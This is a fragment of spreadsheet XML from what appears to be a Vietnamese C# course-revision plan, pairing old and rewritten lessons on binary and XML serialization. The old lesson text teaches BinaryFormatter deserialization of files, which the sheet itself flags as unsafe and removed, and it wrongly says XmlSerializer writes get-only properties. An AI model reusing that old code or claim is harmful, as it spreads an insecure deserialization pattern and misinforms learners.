- Cùng một đối tượng có thể lưu thành **JSON**, **XML** hoặc **nhị phân**.
- JSON dùng `JsonSerializer`: dễ đọc, gọn, phổ biến nhất.
- XML dùng `XmlSerializer`: chặt chẽ nhưng dài, nhiều thẻ lặp lại.
- Nhị phân dùng `BinaryWriter`: gọn nhất nhưng không tự mô tả, phải biết đúng thứ tự trường.
- Không dùng `BinaryFormatter` vì không an toàn và đã bị loại bỏ trong .NET 9.</t>
        </is>
      </c>
    </row>
    <row r="56" ht="409.6" customHeight="1" s="18">
      <c r="A56" s="10" t="n">
        <v>56</v>
      </c>
      <c r="B56" s="10" t="inlineStr">
        <is>
          <t>6. Lưu trữ Đối tượng với Serialization</t>
        </is>
      </c>
      <c r="C56" s="10" t="inlineStr">
        <is>
          <t>Binary Serialization</t>
        </is>
      </c>
      <c r="D56" s="10" t="inlineStr">
        <is>
          <t>Giới thiệu Binary Serialization</t>
        </is>
      </c>
      <c r="E56" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F56" s="13" t="inlineStr">
        <is>
          <t>Làm thêm nếu muốn</t>
        </is>
      </c>
      <c r="G56" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H56" s="10" t="inlineStr">
        <is>
          <t>Thấy dữ liệu nhị phân là các byte được ghi theo đúng thứ tự trường, và phải đọc lại đúng thứ tự đó.</t>
        </is>
      </c>
      <c r="I56" s="10" t="inlineStr">
        <is>
          <t>1 cột, 2 tab</t>
        </is>
      </c>
      <c r="J56" s="10" t="inlineStr">
        <is>
          <t>Dải byte (ô hex) đầy dần khi ghi từng trường, mỗi trường một màu: Id 4 byte, Name gồm 1 byte độ dài + các byte UTF-8, Price 4 byte. Tab Đọc có con trỏ chạy trên dải byte.</t>
        </is>
      </c>
      <c r="K56" s="10" t="inlineStr">
        <is>
          <t>H20, H11</t>
        </is>
      </c>
      <c r="L56" s="10" t="inlineStr">
        <is>
          <t>Ghi (BinaryWriter) | Đọc (BinaryReader)</t>
        </is>
      </c>
      <c r="M56" s="10" t="inlineStr">
        <is>
          <t>Ghi Id = 7 → 07 00 00 00 (int 4 byte, byte thấp trước).
Ghi Name = "Bút" → 04 42 C3 BA 74 (độ dài 4 byte, 'ú' chiếm 2 byte UTF-8).
Ghi Price = 5000 → 88 13 00 00. Tổng 13 byte.
Đọc đúng thứ tự ReadInt32, ReadString, ReadInt32 → khôi phục đúng.
Đọc sai thứ tự (ReadString trước) → dữ liệu vô nghĩa.
Xong.</t>
        </is>
      </c>
      <c r="N56" s="10" t="inlineStr">
        <is>
          <t>Product { Id = 7, Name = "Bút", Price = 5000 }</t>
        </is>
      </c>
      <c r="O56" s="10" t="inlineStr">
        <is>
          <t>Định dạng nhị phân gọn nhưng không tự mô tả: người đọc phải biết đúng thứ tự và kiểu của từng trường.</t>
        </is>
      </c>
      <c r="P56" s="10" t="inlineStr">
        <is>
          <t>Byte được tính đúng theo BinaryWriter (little-endian, độ dài chuỗi mã hóa 7-bit). Không dùng BinaryFormatter (đã bị loại bỏ trong .NET 9).</t>
        </is>
      </c>
      <c r="Q56" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/luu-tru-doi-tuong-voi-serialization/binary-serialization/gioi-thieu-binary-serialization/index.html</t>
        </is>
      </c>
      <c r="R56" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/luu-tru-doi-tuong-voi-serialization/binary-serialization/gioi-thieu-binary-serialization/</t>
        </is>
      </c>
      <c r="S56" s="10" t="inlineStr">
        <is>
          <t>Đề xuất cập nhật học liệu: thay BinaryFormatter bằng BinaryWriter/BinaryReader hoặc JSON.</t>
        </is>
      </c>
      <c r="T56" s="12" t="n"/>
      <c r="U56" s="12" t="n"/>
      <c r="V56" s="21" t="inlineStr">
        <is>
          <t>Tổng quan về Binary Serialization trong .NET
Trong module này, chúng ta sẽ tìm hiểu về Serialization – một kỹ thuật mạnh mẽ cho phép chúng ta chuyển đổi trạng thái của một đối tượng (object) thành một định dạng có thể lưu trữ hoặc truyền đi, và sau đó khôi phục lại đối tượng đó từ định dạng đã lưu. Điều này cực kỳ hữu ích cho việc lưu trữ dữ liệu ứng dụng, truyền đối tượng giữa các tiến trình (processes) hoặc qua mạng.
Binary Serialization là một trong những phương pháp serialization được tích hợp sẵn trong .NET Framework và .NET. Đúng như tên gọi, nó chuyển đổi trạng thái của đối tượng thành một luồng byte nhị phân (binary stream).
Ưu và nhược điểm của Binary Serialization
Ưu điểm:
Hiệu quả: Dữ liệu nhị phân thường nhỏ gọn hơn so với các định dạng văn bản như XML hay JSON, giúp tiết kiệm không gian lưu trữ và băng thông mạng.
Tốc độ: Quá trình chuyển đổi và khôi phục (serialize/deserialize) thường nhanh hơn do không cần phân tích cú pháp văn bản.
Bảo toàn cấu trúc đối tượng: Binary Serialization có khả năng bảo toàn toàn bộ cấu trúc đồ thị đối tượng (object graph), bao gồm các tham chiếu vòng lặp (circular references) và các mối quan hệ phức tạp giữa các đối tượng.
Đặc thù .NET: Hoạt động tốt nhất khi bạn cần lưu trữ và khôi phục đối tượng giữa các ứng dụng .NET khác nhau, hoặc trong cùng một ứng dụng.
Nhược điểm:
Không thân thiện với con người: Dữ liệu nhị phân không thể đọc được bằng mắt thường, gây khó khăn cho việc gỡ lỗi hoặc chỉnh sửa thủ công.
Phụ thuộc nền tảng: Định dạng nhị phân có thể không tương thích tốt giữa các phiên bản .NET khác nhau hoặc giữa các nền tảng không phải .NET. Điều này làm cho nó ít phù hợp hơn cho các kịch bản tương tác đa nền tảng hoặc API công cộng.
Vấn đề bảo mật: Việc giải mã (deserialization) dữ liệu nhị phân từ các nguồn không đáng tin cậy có thể dẫn đến các lỗ hổng bảo mật nghiêm trọng.
Khi nào nên sử dụng Binary Serialization?
Binary Serialization là lựa chọn tốt nhất khi bạn cần:
Lưu trữ trạng thái nội bộ của ứng dụng (ví dụ: file lưu game, cấu hình ứng dụng).
Truyền đối tượng giữa các tiến trình .NET trên cùng một máy tính.
Lưu trữ dữ liệu tạm thời mà không cần khả năng đọc/chỉnh sửa của con người.
Sử dụng BinaryFormatter và namespace System.Runtime.Serialization.Formatters.Binary
Trong .NET, lớp chính chịu trách nhiệm thực hiện Binary Serialization là BinaryFormatter. Lớp này nằm trong namespace System.Runtime.Serialization.Formatters.Binary. Để sử dụng nó, bạn cần thêm using System.Runtime.Serialization.Formatters.Binary; vào đầu file mã nguồn của mình.
Quá trình serialization và deserialization sử dụng BinaryFormatter thường bao gồm các bước sau:
Serialization (Lưu đối tượng vào file)
Tạo một stream (luồng) để ghi dữ liệu. Thông thường, chúng ta sẽ sử dụng FileStream để ghi vào một file trên đĩa.
Tạo một thể hiện (instance) của BinaryFormatter.
Gọi phương thức Serialize() của BinaryFormatter, truyền vào stream và đối tượng cần serialize.
using System;
using System.IO;
using System.Runtime.Serialization.Formatters.Binary;
// (Giả định có một lớp MyObject được đánh dấu [Serializable] - sẽ nói rõ hơn ở phần sau)
public class MyObject
{
    public int Id { get; set; }
    public string Name { get; set; }
    public DateTime CreatedDate { get; set; }
}
public static class BinarySerializer
{
    public static void SaveObject(string filePath, MyObject objToSave)
    {
        // 1. Tạo FileStream để ghi dữ liệu vào file
        using (FileStream stream = new FileStream(filePath, FileMode.Create))
        {
            // 2. Tạo một thể hiện của BinaryFormatter
            BinaryFormatter formatter = new BinaryFormatter();
            // 3. Gọi Serialize để ghi đối tượng vào stream
            formatter.Serialize(stream, objToSave);
            Console.WriteLine($"Đối tượng đã được lưu vào: {filePath}");
        }
    }
}
Deserialization (Khôi phục đối tượng từ file)
Tạo một stream để đọc dữ liệu từ file.
Tạo một thể hiện của BinaryFormatter.
Gọi phương thức Deserialize() của BinaryFormatter, truyền vào stream. Kết quả trả về là kiểu object, bạn cần ép kiểu (cast) nó về kiểu đối tượng ban đầu.
using System;
using System.IO;
using System.Runtime.Serialization.Formatters.Binary;
public static class BinarySerializer
{
    // ... (phương thức SaveObject ở trên)
    public static MyObject LoadObject(string filePath)
    {
        if (!File.Exists(filePath))
        {
            Console.WriteLine($"File không tồn tại: {filePath}");
            return null;
        }
        // 1. Tạo FileStream để đọc dữ liệu từ file
        using (FileStream stream = new FileStream(filePath, FileMode.Open))
        {
            // 2. Tạo một thể hiện của BinaryFormatter
            BinaryFormatter formatter = new BinaryFormatter();
            // 3. Gọi Deserialize và ép kiểu về MyObject
            MyObject loadedObj = (MyObject)formatter.Deserialize(stream);
            Console.WriteLine($"Đối tượng đã được khôi phục từ: {filePath}");
            return loadedObj;
        }
    }
}
Yêu cầu [Serializable] attribute cho lớp
Một yêu cầu quan trọng và bắt buộc để BinaryFormatter có thể hoạt động là lớp mà bạn muốn serialize phải được đánh dấu bằng thuộc tính [Serializable].
using System; // Cần thiết cho thuộc tính [Serializable]
[Serializable] // Thêm thuộc tính này vào lớp
public class MyObject
{
    public int Id { get; set; }
    public string Name { get; set; }
    public DateTime CreatedDate { get; set; }
    // public string TempData { get; set; } // Nếu không có [Serializable], sẽ lỗi
}
Tại sao cần [Serializable]?
Thuộc tính [Serializable] là một cơ chế "chọn tham gia" (opt-in) mà .NET yêu cầu. Nó báo hiệu cho runtime rằng lớp này được thiết kế và cho phép để được chuyển đổi thành định dạng nhị phân. Nếu bạn cố gắng serialize một đối tượng mà lớp của nó không có thuộc tính [Serializable], bạn sẽ gặp lỗi SerializationException.
Điều này giúp đảm bảo rằng các nhà phát triển phải chủ động xem xét và chấp nhận rằng trạng thái của đối tượng có thể được lưu trữ và khôi phục, giúp ngăn chặn việc vô tình serialize các đối tượng không an toàn hoặc không mong muốn (ví dụ: các đối tượng chứa thông tin nhạy cảm không nên lưu trữ).
Xử lý các trường không thể serialize ([NonSerialized])
Đôi khi, một lớp có thể có một số trường (field) mà bạn không muốn hoặc không thể serialize. Ví dụ: một kết nối cơ sở dữ liệu, một đối tượng giao diện người dùng (UI element), hoặc dữ liệu tạm thời chỉ có ý nghĩa trong thời gian chạy của ứng dụng.
Trong trường hợp này, bạn có thể đánh dấu các trường đó bằng thuộc tính [NonSerialized]. Khi BinaryFormatter thực hiện serialization, nó sẽ bỏ qua các trường được đánh dấu [NonSerialized].
using System;
[Serializable]
public class UserSettings
{
    public string UserName { get; set; }
    public int ThemeId { get; set; }
    public bool AutoLogin { get; set; }
    [NonSerialized] // Trường này sẽ không được serialize
    private string _temporarySessionToken;
    public void SetSessionToken(string token)
    {
        _temporarySessionToken = token;
    }
    public string GetSessionToken()
    {
        return _temporarySessionToken;
    }
}
Trong ví dụ trên, _temporarySessionToken là một trường chỉ có ý nghĩa trong phiên làm việc hiện tại và không cần thiết phải lưu trữ. Khi một đối tượng UserSettings được serialize, giá trị của _temporarySessionToken sẽ không được ghi vào luồng nhị phân. Khi đối tượng được deserialize, trường này sẽ có giá trị mặc định của kiểu dữ liệu (ví dụ: null cho string).
Việc sử dụng [Serializable] và [NonSerialized] là nền tảng để kiểm soát cách các đối tượng của bạn được lưu trữ và khôi phục bằng Binary Serialization.</t>
        </is>
      </c>
      <c r="W56" s="22" t="inlineStr">
        <is>
          <t># Giới thiệu Binary Serialization
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Giải thích **Binary Serialization** là gì và khi nào nên dùng.
- Nêu ưu điểm và nhược điểm của định dạng nhị phân.
- Viết code ghi và đọc một đối tượng bằng `BinaryWriter` và `BinaryReader`.
- Giải thích vì sao phải đọc đúng thứ tự và đúng kiểu mà lúc ghi đã dùng.
- Nhận ra vì sao `BinaryFormatter` không còn được dùng.
- Quan sát từng byte được ghi, rồi đọc lại đúng và đọc sai thứ tự, bằng hoạt động mô phỏng.
## Binary Serialization là gì?
**Binary Serialization** biến trạng thái của đối tượng thành một dãy **byte** nhị phân (binary) để lưu vào tệp hoặc gửi đi. Khác với JSON hay XML, dữ liệu này không phải chữ nên mắt thường không đọc được.
### Ưu điểm và nhược điểm
| | Nhị phân |
|---|---|
| Ưu điểm | Gọn, tiết kiệm dung lượng. Đọc và ghi nhanh vì không phải phân tích cú pháp chữ. |
| Nhược điểm | Người không đọc được, khó kiểm tra bằng tay. Không có tên trường đi kèm, nên phải biết đúng thứ tự và kiểu khi đọc. Khó dùng chung với hệ thống khác. |
Định dạng này hợp với dữ liệu nội bộ của chính ứng dụng, ví dụ tệp lưu tiến trình trò chơi hoặc bộ nhớ đệm tạm, và không cần người đọc hay sửa tay.
## Lưu ý về BinaryFormatter
&gt; **Lưu ý:** nhiều tài liệu cũ dạy Binary Serialization bằng `BinaryFormatter`, cùng với `[Serializable]` và `[NonSerialized]`. Đừng dùng cách này. Khi đọc dữ liệu từ nguồn không đáng tin, `BinaryFormatter` có thể bị lợi dụng để chạy mã độc. Microsoft đã đánh dấu nó là không an toàn, và từ .NET 9 nó bị loại bỏ: gọi `Serialize` hoặc `Deserialize` sẽ ném exception.
Thay vào đó, bài này dùng cách thủ công nhưng an toàn và dễ hiểu: **`BinaryWriter`** để ghi và **`BinaryReader`** để đọc, cả hai nằm trong `System.IO`. Bạn tự quyết định ghi trường nào, theo thứ tự nào. Nếu cần định dạng tự mô tả, hãy chuyển sang JSON.
## Ghi bằng BinaryWriter
`BinaryWriter` ghi các kiểu cơ bản vào một luồng (stream) bằng các phương thức `Write(...)`. Quy tắc ghi của từng kiểu:
- `int`: **4 byte**, byte thấp ghi trước (little-endian). Ví dụ `7` thành `07 00 00 00`.
- `string`: **1 byte độ dài** (với chuỗi ngắn), rồi các byte **UTF-8** của chuỗi. Chữ "ú" chiếm 2 byte (`C3 BA`).
Ví dụ lưu một `Product` có `Id = 7`, `Name = "Bút"`, `Price = 5000`:
```csharp
using System;
using System.IO;
public class Product
{
    public int Id { get; set; }
    public string Name { get; set; }
    public int Price { get; set; }
}
public class Program
{
    public static void Main()
    {
        var p = new Product { Id = 7, Name = "Bút", Price = 5000 };
        using var ms = new MemoryStream();
        using var w = new BinaryWriter(ms);
        w.Write(p.Id);      // 4 byte:  07 00 00 00
        w.Write(p.Name);    // 5 byte:  04 42 C3 BA 74  (độ dài 4, rồi "Bút")
        w.Write(p.Price);   // 4 byte:  88 13 00 00     (5000 = 0x1388)
        Console.WriteLine(ms.Length);                          // 13
        Console.WriteLine(BitConverter.ToString(ms.ToArray()));
        // 07-00-00-00-04-42-C3-BA-74-88-13-00-00
    }
}
```
Tổng cộng 4 + 1 + 4 + 4 = **13 byte**. Để ghi ra tệp, thay `MemoryStream` bằng `File.Create("product.bin")`.
## Đọc bằng BinaryReader
`BinaryReader` đọc ngược lại bằng `ReadInt32()`, `ReadString()`... Nó **không biết** tên trường hay kiểu dữ liệu. Nó chỉ làm đúng theo lệnh của bạn, từ byte đầu đến cuối.
```csharp
using System;
using System.IO;
public class Program
{
    public static void Main()
    {
        byte[] bytes = { 7, 0, 0, 0, 4, 0x42, 0xC3, 0xBA, 0x74, 0x88, 0x13, 0, 0 };
        // Đọc ĐÚNG thứ tự đã ghi
        using var r = new BinaryReader(new MemoryStream(bytes));
        int id = r.ReadInt32();        // 7
        string name = r.ReadString();  // "Bút"
        int price = r.ReadInt32();     // 5000
        Console.WriteLine($"{id} {name} {price}"); // 7 Bút 5000
        // Đọc SAI thứ tự: ReadString trước
        using var r2 = new BinaryReader(new MemoryStream(bytes));
        string x = r2.ReadString();    // byte đầu là 07 nên nó đọc 7 byte kế tiếp: dữ liệu vô nghĩa
        int y = r2.ReadInt32();        // 1280116, không phải Price
        Console.WriteLine(y);          // 1280116
    }
}
```
Đọc sai thứ tự **không báo lỗi** mà chỉ trả về dữ liệu vô nghĩa. Vì vậy hãy đọc đúng thứ tự đã ghi, và dùng đúng kiểu cho từng trường.
## Hoạt động: Ghi byte và đọc lại đúng thứ tự
Mô phỏng dưới đây ghi từng trường của `Product` thành dải byte rồi đọc lại. Hãy thao tác theo thứ tự sau, bấm **Bước tiếp** để chạy từng dòng:
- Mở tab **Ghi (BinaryWriter)**. Dải byte (hex) ban đầu trống. `w.Write(p.Id)` thêm 4 ô `07 00 00 00`. `w.Write(p.Name)` thêm 1 byte độ dài (`04`) và 4 byte UTF-8 của "Bút" (`42 C3 BA 74`). `w.Write(p.Price)` thêm `88 13 00 00`. Mỗi trường có một màu riêng, kèm chú giải các trường. Cuối cùng `ms.Length` là **13** (4 + 1 + 4 + 4). Dải byte chỉ có số, không có tên trường nào.
- Chuyển sang tab **Đọc (BinaryReader)**. Con trỏ chạy từ trái sang phải trên 13 ô. `ReadInt32()` gom 4 byte đầu thành `id = 7`. `ReadString()` thấy byte `04` nên đọc tiếp 4 byte ra `name = "Bút"`. `ReadInt32()` cuối ghép `88 13 00 00` thành `price = 5000`. Bảng "Kết quả đọc" lần lượt hiện giá trị đúng.
- Vẫn ở tab này, bấm tiếp phần "đọc sai thứ tự". Lần này `ReadString()` được gọi trước. Byte đầu là `07` nên nó tưởng chuỗi dài 7 byte, nuốt luôn byte của `Id` và `Name`. Các ô bị tô đỏ, `x` ra chuỗi vô nghĩa. `ReadInt32()` tiếp theo cho `y = 1280116`, không phải `Price`. Không có lỗi nào được báo.
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/luu-tru-doi-tuong-voi-serialization/binary-serialization/gioi-thieu-binary-serialization/" title="Giới thiệu Binary Serialization" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: dữ liệu nhị phân chỉ là các byte được ghi liền nhau theo đúng thứ tự trường. Không có tên hay kiểu đi kèm, nên phải đọc lại đúng thứ tự và đúng kiểu, nếu không ta nhận về dữ liệu sai mà không có cảnh báo.
## Khi nào nên dùng?
- Lưu trạng thái nội bộ của ứng dụng (tệp lưu game, bộ nhớ đệm) mà người dùng không cần đọc.
- Dữ liệu cần gọn và nhanh.
- Không dùng khi cần trao đổi với hệ thống khác, cần người đọc hay sửa tay, hoặc dữ liệu sẽ thay đổi cấu trúc nhiều (khi đó JSON linh hoạt hơn).
## Tóm tắt
- **Binary Serialization** biến đối tượng thành dãy byte: gọn, nhanh nhưng người không đọc được.
- Dùng `BinaryWriter` để ghi và `BinaryReader` để đọc, cả hai trong `System.IO`.
- `int` chiếm 4 byte (byte thấp trước); `string` gồm 1 byte độ dài rồi các byte UTF-8.
- Phải đọc đúng thứ tự và đúng kiểu đã ghi. Đọc sai sẽ ra dữ liệu vô nghĩa và không có lỗi báo.
- Không dùng `BinaryFormatter`: không an toàn và đã bị loại bỏ trong .NET 9.</t>
        </is>
      </c>
    </row>
    <row r="57" ht="409.6" customHeight="1" s="18">
      <c r="A57" s="10" t="n">
        <v>57</v>
      </c>
      <c r="B57" s="10" t="inlineStr">
        <is>
          <t>6. Lưu trữ Đối tượng với Serialization</t>
        </is>
      </c>
      <c r="C57" s="10" t="inlineStr">
        <is>
          <t>XML Serialization</t>
        </is>
      </c>
      <c r="D57" s="10" t="inlineStr">
        <is>
          <t>Giới thiệu XML Serialization</t>
        </is>
      </c>
      <c r="E57" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F57" s="11" t="inlineStr">
        <is>
          <t>Nên làm</t>
        </is>
      </c>
      <c r="G57" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H57" s="10" t="inlineStr">
        <is>
          <t>Thấy XmlSerializer ánh xạ thuộc tính public thành phần tử XML, và điều kiện lớp cần có.</t>
        </is>
      </c>
      <c r="I57" s="10" t="inlineStr">
        <is>
          <t>1 cột, 3 tab</t>
        </is>
      </c>
      <c r="J57" s="10" t="inlineStr">
        <is>
          <t>Thẻ đối tượng bên trái, cây XML bên phải; đường nối màu từ mỗi thuộc tính public tới thẻ XML tương ứng; trường private không có đường nối (mờ).</t>
        </is>
      </c>
      <c r="K57" s="10" t="inlineStr">
        <is>
          <t>H19, H03</t>
        </is>
      </c>
      <c r="L57" s="10" t="inlineStr">
        <is>
          <t>Serialize | Deserialize | Thiếu constructor không tham số</t>
        </is>
      </c>
      <c r="M57" s="10" t="inlineStr">
        <is>
          <t>Serialize: new XmlSerializer(typeof(Product)); mỗi thuộc tính public → một phần tử (&lt;Id&gt;, &lt;Name&gt;, &lt;Price&gt;); trường private bị bỏ qua.
Deserialize: đọc XML → tạo Product mới bằng constructor không tham số → gán từng thuộc tính.
Thiếu constructor không tham số: new XmlSerializer(typeof(Product)) → InvalidOperationException "Product cannot be serialized because it does not have a parameterless constructor."
Bước cuối mỗi tab: kết quả.</t>
        </is>
      </c>
      <c r="N57" s="10" t="inlineStr">
        <is>
          <t>Product { Id = 7, Name = "Bút", Price = 5000 }</t>
        </is>
      </c>
      <c r="O57" s="10" t="inlineStr">
        <is>
          <t>XmlSerializer cần lớp public, constructor không tham số, và chỉ ghi các thành viên public.</t>
        </is>
      </c>
      <c r="P57" s="10" t="n"/>
      <c r="Q57" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/luu-tru-doi-tuong-voi-serialization/xml-serialization/gioi-thieu-xml-serialization/index.html</t>
        </is>
      </c>
      <c r="R57" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/luu-tru-doi-tuong-voi-serialization/xml-serialization/gioi-thieu-xml-serialization/</t>
        </is>
      </c>
      <c r="S57" s="10" t="n"/>
      <c r="T57" s="12" t="n"/>
      <c r="U57" s="12" t="n"/>
      <c r="V57" s="21" t="inlineStr">
        <is>
          <t>Tổng quan về XML Serialization trong .NET
Trong module này, chúng ta đã tìm hiểu về khái niệm Serialization – quá trình chuyển đổi trạng thái của một đối tượng thành một định dạng có thể lưu trữ hoặc truyền tải, và sau đó tái tạo lại đối tượng từ định dạng đó (Deserialization). C# và .NET cung cấp nhiều cơ chế serialization khác nhau, và một trong những phương pháp phổ biến và mạnh mẽ nhất chính là XML Serialization.
XML (Extensible Markup Language) là một định dạng văn bản có cấu trúc, dễ đọc bởi con người và máy móc. Nhờ tính linh hoạt và khả năng tự mô tả, XML đã trở thành lựa chọn hàng đầu cho việc lưu trữ cấu hình ứng dụng, trao đổi dữ liệu giữa các hệ thống (ví dụ: Web Services) hoặc thậm chí là lưu trữ dữ liệu người dùng.
Trong .NET, XML Serialization cho phép bạn chuyển đổi các đối tượng C# thành tài liệu XML và ngược lại. Điều này có nghĩa là bạn có thể lưu toàn bộ trạng thái của một đối tượng phức tạp (với các thuộc tính, danh sách, đối tượng lồng nhau) vào một tệp XML và sau đó tải lại nó một cách dễ dàng bất cứ khi nào cần thiết. Ưu điểm nổi bật của XML Serialization bao gồm:
Tính dễ đọc: Dữ liệu XML có cấu trúc rõ ràng, dễ dàng kiểm tra và chỉnh sửa bằng tay.
Tính tương thích: XML là một tiêu chuẩn mở, được hỗ trợ rộng rãi trên nhiều nền tảng và ngôn ngữ lập trình khác nhau, giúp việc trao đổi dữ liệu trở nên thuận tiện.
Tính linh hoạt: Bạn có thể kiểm soát khá tốt cấu trúc XML đầu ra bằng cách sử dụng các thuộc tính (attributes) đặc biệt, giúp tùy chỉnh tên phần tử, thứ tự, v.v.
Sử dụng XmlSerializer và namespace System.Xml.Serialization
Để thực hiện XML Serialization trong .NET, lớp chính mà chúng ta sẽ làm việc là XmlSerializer, nằm trong namespace System.Xml.Serialization. Lớp này cung cấp các phương thức để chuyển đổi đối tượng thành XML và ngược lại.
Quy trình cơ bản để serialize một đối tượng như sau:
Tạo một thể hiện của XmlSerializer, truyền vào kiểu dữ liệu của đối tượng bạn muốn serialize.
Gọi phương thức Serialize() của XmlSerializer, truyền vào một luồng (stream) hoặc TextWriter để ghi dữ liệu XML và đối tượng cần serialize.
Và để deserialize một đối tượng từ XML:
Tạo một thể hiện của XmlSerializer với kiểu dữ liệu tương ứng.
Gọi phương thức Deserialize() của XmlSerializer, truyền vào một luồng (stream) hoặc TextReader chứa dữ liệu XML. Phương thức này sẽ trả về một đối tượng đã được tái tạo.
Hãy xem xét một ví dụ đơn giản với một lớp Book:
using System;
using System.IO;
using System.Xml.Serialization;
public class Book
{
    public string Title { get; set; }
    public string Author { get; set; }
    public int PublicationYear { get; set; }
    public decimal Price { get; set; }
}
public class Program
{
    public static void Main(string[] args)
    {
        // 1. Tạo đối tượng Book
        Book myBook = new Book
        {
            Title = "The Hitchhiker's Guide to the Galaxy",
            Author = "Douglas Adams",
            PublicationYear = 1979,
            Price = 12.99m
        };
        // 2. Thực hiện Serialization
        XmlSerializer serializer = new XmlSerializer(typeof(Book));
        string filePath = "myBook.xml";
        using (TextWriter writer = new StreamWriter(filePath))
        {
            serializer.Serialize(writer, myBook);
        }
        Console.WriteLine($"Đối tượng đã được serialize vào tệp: {filePath}");
        // 3. Thực hiện Deserialization
        Book loadedBook;
        using (TextReader reader = new StreamReader(filePath))
        {
            loadedBook = (Book)serializer.Deserialize(reader);
        }
        Console.WriteLine("\nĐối tượng được tải lại từ XML:");
        Console.WriteLine($"Tiêu đề: {loadedBook.Title}");
        Console.WriteLine($"Tác giả: {loadedBook.Author}");
        Console.WriteLine($"Năm xuất bản: {loadedBook.PublicationYear}");
        Console.WriteLine($"Giá: {loadedBook.Price}");
    }
}
Khi chạy chương trình này, một tệp myBook.xml sẽ được tạo với nội dung tương tự như sau:
&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;Book xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"&gt;
  &lt;Title&gt;The Hitchhiker's Guide to the Galaxy&lt;/Title&gt;
  &lt;Author&gt;Douglas Adams&lt;/Author&gt;
  &lt;PublicationYear&gt;1979&lt;/PublicationYear&gt;
  &lt;Price&gt;12.99&lt;/Price&gt;
&lt;/Book&gt;
Bạn có thể thấy rõ ràng cấu trúc XML tương ứng với các thuộc tính của đối tượng Book.
Các quy tắc: Chỉ serialize các trường và thuộc tính công khai (public fields/properties)
Một điểm khác biệt quan trọng của XmlSerializer so với một số cơ chế serialization khác (như BinaryFormatter) là nó có các quy tắc nghiêm ngặt về những gì có thể được serialize. Cụ thể:
Chỉ các thành viên công khai (public members) được serialize:XmlSerializer sẽ chỉ serialize các trường (fields) và thuộc tính (properties) có modifier public. Các trường private, protected, hoặc internal sẽ bị bỏ qua hoàn toàn trong quá trình serialization.
Thuộc tính phải có getter và setter công khai: Đối với các thuộc tính, chúng phải có cả public get và public set để có thể được serialize và deserialize một cách đúng đắn. Nếu một thuộc tính chỉ có public get (read-only), nó sẽ được serialize nhưng không thể được gán giá trị khi deserialize, dẫn đến việc giá trị đó bị mất trong quá trình khôi phục đối tượng.
Lý do đằng sau quy tắc này là XML Serialization thường được dùng để tạo ra một "hợp đồng dữ liệu" (data contract) hoặc một giao diện công khai cho đối tượng. Các chi tiết triển khai nội bộ (thường được lưu trữ trong các trường private) không cần thiết phải được công khai ra ngoài.
Hãy điều chỉnh lớp Book để minh họa điều này:
public class Book
{
    public string Title { get; set; }
    public string Author { get; set; }
    public int PublicationYear { get; set; }
    public decimal Price { get; set; }
    // Trường private này sẽ bị bỏ qua
    private string _internalId = Guid.NewGuid().ToString();
    // Thuộc tính chỉ đọc (read-only) này sẽ được serialize nhưng không deserialize được
    public string Description { get; } = "A fascinating read.";
    // Thuộc tính internal này sẽ bị bỏ qua
    internal string ISBN { get; set; } = "978-0345391803";
}
Nếu bạn serialize đối tượng Book này, tệp XML sẽ vẫn chỉ chứa Title, Author, PublicationYear, Price và Description. Các trường _internalId và ISBN sẽ không xuất hiện. Khi deserialize, giá trị của Description sẽ không được khôi phục từ XML (nó sẽ nhận giá trị mặc định được gán trong constructor hoặc null nếu không có giá trị mặc định).
Không cần [Serializable] attribute
Một điểm khác biệt quan trọng nữa của XML Serialization so với Binary Serialization là bạn không cần phải đánh dấu lớp của mình bằng thuộc tính [Serializable].
Thuộc tính [Serializable] được sử dụng chủ yếu bởi BinaryFormatter (và các formatter tương tự) để báo hiệu rằng một lớp có thể được serialize bằng cơ chế nhị phân của .NET. XmlSerializer hoạt động theo một cách khác hoàn toàn: nó sử dụng Reflection để kiểm tra các thành viên công khai của lớp và xây dựng cấu trúc XML dựa trên đó.
Điều này có nghĩa là bạn có thể tạo một lớp đơn giản như sau và nó sẽ hoàn toàn có thể được XML serialize:
public class AuthorInfo // Không cần [Serializable]
{
    public string Name { get; set; }
    public int Age { get; set; }
}
Việc không yêu cầu [Serializable] giúp giữ cho mã nguồn sạch sẽ hơn khi bạn chỉ có ý định sử dụng XML Serialization. Nếu bạn thấy một lớp có cả [Serializable] và được dùng với XmlSerializer, thuộc tính [Serializable] đó là thừa và không có tác dụng gì đối với quá trình XML Serialization.</t>
        </is>
      </c>
      <c r="W57" s="22" t="inlineStr">
        <is>
          <t># Giới thiệu XML Serialization
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Giải thích **XML Serialization** là gì và `XmlSerializer` làm việc gì.
- Viết code serialize và deserialize một đối tượng bằng `XmlSerializer`.
- Nêu quy tắc: chỉ thành viên **public** được ghi, và lớp cần constructor không tham số.
- Nhận ra thông báo lỗi khi lớp thiếu constructor không tham số, và cách sửa.
- Quan sát cách mỗi thuộc tính public thành một phần tử XML bằng hoạt động mô phỏng.
## XML và XmlSerializer
**XML** (Extensible Markup Language) là định dạng văn bản có cấu trúc, mỗi giá trị nằm trong cặp thẻ mở và thẻ đóng. XML dễ đọc, là tiêu chuẩn mở, và vẫn được dùng nhiều trong tệp cấu hình và hệ thống cũ.
**XML Serialization** biến đối tượng C# thành tài liệu XML, và ngược lại. Lớp làm việc này là `XmlSerializer` trong namespace `System.Xml.Serialization`. Quy trình gồm hai bước:
1. Tạo `XmlSerializer`, truyền vào kiểu của đối tượng bằng `typeof(...)`.
